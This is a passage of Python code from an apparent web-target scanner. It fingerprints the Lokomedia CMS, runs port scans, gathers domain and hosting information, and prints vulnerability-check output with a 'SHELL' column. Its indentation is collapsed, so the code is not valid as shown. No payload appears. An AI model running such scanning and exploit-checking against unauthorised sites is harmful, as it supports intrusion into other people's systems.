print(' %s Scanning Ports\n' % (run)) print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W)) portscan(hostd(url)) print("-----------------------------------------------") if exploit: print(' %s Check Vulnerability\n' % (run)) print(""" %sNAME %sSTATUS %sSHELL""" % (W, W, W)) ############################ # # # Lokomedia # # # ############################ #lokomedia searching content to detect. print(' %s Check Vulnerability' % (run)) elif re.search(re.compile(r'image/gif'), lm_content): print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end)) print('------------------------------------------------') print(' %s looking for cms' % (que)) print(' %s CMS : Lokomedia' % (good)) print('------------------------------------------------') domain_info(subdomains) if scanports: print(' %s Scanning Ports\n' % (run)) print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W)) portscan(hostd(url)) print("-----------------------------------------------") print(' %s Check Vulnerability' % (run)) elif re.search(re.compile(r'lokomedia'), lm2_content): print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end)) print('------------------------------------------------') print(' %s looking for cms' % (que)) print(' %s CMS : Lokomedia' % (good)) print('------------------------------------------------') domain_info(subdomains) if scanports: print(' %s Scanning Ports\n' % (run)) print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W)) portscan(hostd(url)) print("-----------------------------------------------") print(' %s Check Vulnerability' % (run)) ############################ # # # Unknown # # # ############################ #no cms detect else: print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end)) print('------------------------------------------------') print(' %s looking for cms' % (que)) print(' %s CMS : Unknown' % (bad)) print('------------------------------------------------') if webinfo: webhosting_info(hostinfo) #domain gatherinargument if domaininfo: domain_info(subdomains)